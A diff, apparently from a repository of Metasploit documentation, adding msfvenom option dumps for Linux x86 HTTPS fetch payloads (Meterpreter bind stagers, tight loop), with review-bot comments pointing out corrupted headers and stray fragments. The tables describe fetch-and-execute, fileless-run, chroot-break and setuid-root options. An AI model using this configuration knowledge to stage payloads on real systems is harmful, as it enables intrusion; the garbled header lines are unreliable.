+ Generate a debug trap in the target process + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
diff --git a/msfvenom/payload_options/cmd-linux-https-x86-generic-tight_loop.txt b/msfvenom/payload_options/cmd-linux-https-x86-generic-tight_loop.txt new file mode 100644 index 0000000..3891f8e --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-generic-tight_loop.txt 
@@ -0,0 +1,70 @@ + + Name: HTTPS Fetch, Generic x86 Tight Loop + Module: payload/cmd/linux/https/x86/generic/tight_loop + Platform: Linux, BSD, BSDi, OSX, Solaris, Windows + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + jduck + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME TObgXvbaK no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. 
+ Generate a tight loop in the target process + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
diff --git a/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-bind_ipv6_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-bind_ipv6_tcp.txt new file mode 100644 index 0000000..8724ace --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-bind_ipv6_tcp.txt 
@@ -0,0 +1,107 @@ + + Name: HTTPS Fetch, Bind IPv6 TCP Stager (Linux x86) + Module: payload/cmd/linux/https/x86/meterpreter/bind_ipv6_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: +Evasion options for payload/cmd/linux/https/x86/meterpreter/bind_ipv6_tcp: +========================= + +am_webb@rapid7.com> + kris katterjohn + egypt + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME WArgZxVBXY no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. 
+ Listen for an IPv6 connection (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. 
+ EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID 
value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
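Review bot: The header of this dump is corrupted: `Total size:` is empty, the `Rank:` line and the `Provided by:` heading are missing, and an `Evasion options for ...:` banner with its `=====` underline sits where the contributor list should start, followed by a truncated `am_webb@rapid7.com>` fragment. That pattern looks like two output streams being interleaved or partially dropped during capture; regenerate this file with stdout and stderr captured in order into the same file and confirm the `Provided by:` block lists the full first contributor. Two items that come from module metadata rather than from this change, but are worth flagging upstream: `Platform: Linux, Linux` is duplicated, and the `AppendExit` description is identical to `PrependChrootBreak`'s.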
diff --git a/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-bind_ipv6_tcp_uuid.txt b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-bind_ipv6_tcp_uuid.txt new file mode 100644 index 0000000..8afca5c --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-bind_ipv6_tcp_uuid.txt 
@@ -0,0 +1,107 @@ + + Name: HTTPS Fetch, Bind IPv6 TCP Stager with UUID Support (Linux x86) + Module: payload/cmd/linux/https/x86/meterpreter/bind_ipv6_tcp_uuid + Platform: Linux, Linux + Arch: cmd +Needs Admin: No +Evasion options for payload/cmd/linux/https/x86/meterpreter/bind_ipv6_tcp_uuid: +========================= + +b + kris katterjohn + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME nWDjYrvz no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. 
+ Listen for an IPv6 connection with UUID Support (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. 
+ EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID 
value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
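Review bot: Both the `Total size:` and `Rank:` lines are absent from this dump, and the `Provided by:` heading has been replaced by a misplaced `Evasion options for ...:` banner and a single stray `b` where the first contributor's name should be. Since the same corruption appears in several files in this change, a cheap guard would be for the generator script to refuse to write a dump unless it contains `Total size:`, `Rank:` and `Provided by:` in that order; that would catch truncated or interleaved captures before they are committed.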
diff --git a/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-bind_nonx_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-bind_nonx_tcp.txt new file mode 100644 index 0000000..780600a --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-bind_nonx_tcp.txt 
@@ -0,0 +1,107 @@ + + Name: HTTPS Fetch, Bind TCP Stager + Module: payload/cmd/linux/https/x86/meterpreter/bind_nonx_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 116 + Rank: +Evasion options for payload/cmd/linux/https/x86/meterpreter/bind_nonx_tcp: +========================= + +m> + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME AZeAVAmQjERb no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. 
+ Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. 
+ EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID 
value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
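Review bot: `Rank:` is empty and the `Provided by:` heading is missing in this dump, with an `Evasion options for ...:` banner and a two-character `m>` fragment standing in for the contributor list, even though `Total size: 116` survived. The capture is evidently dropping part of the module info block; please regenerate this file and compare its header against the tight_loop dump in this same change, which has the complete `Total size` / `Rank` / `Provided by` sequence and can serve as the reference shape.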
diff --git a/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-bind_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-bind_tcp.txt new file mode 100644 index 0000000..ea92dad --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-bind_tcp.txt 
@@ -0,0 +1,107 @@ + + Name: HTTPS Fetch, Bind TCP Stager (Linux x86) + Module: payload/cmd/linux/https/x86/meterpreter/bind_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: +Evasion options for payload/cmd/linux/https/x86/meterpreter/bind_tcp: +========================= + +william_webb@rapid7.com> + skape + egypt + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME tpmwvERqVxlW no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. 
+ Listen for a connection (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. 
+ EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID 
value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
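Review bot: `Total size:` has no value and the `Rank:` and `Provided by:` lines are gone; what remains of the contributor list is a truncated `william_webb@rapid7.com>` with the name and opening bracket cut off, preceded by an out-of-place `Evasion options for ...:` banner. This file should be regenerated rather than committed as-is, since a reader cannot tell from it who maintains the module or how large the generated command is.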
diff --git a/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-bind_tcp_uuid.txt b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-bind_tcp_uuid.txt new file mode 100644 index 0000000..aec5ece --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-bind_tcp_uuid.txt 
@@ -0,0 +1,107 @@ + + Name: HTTPS Fetch, Bind TCP Stager with UUID Support (Linux x86) + Module: payload/cmd/linux/https/x86/meterpreter/bind_tcp_uuid + Platform: Linux, Linux + Arch: cmd +Needs Admin: No +Evasion options for payload/cmd/linux/https/x86/meterpreter/bind_tcp_uuid: +========================= + +m Webb + skape + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME rZQaPXfpMj no Name to use on remote system when storing payload; cannot contain spaces or slashes 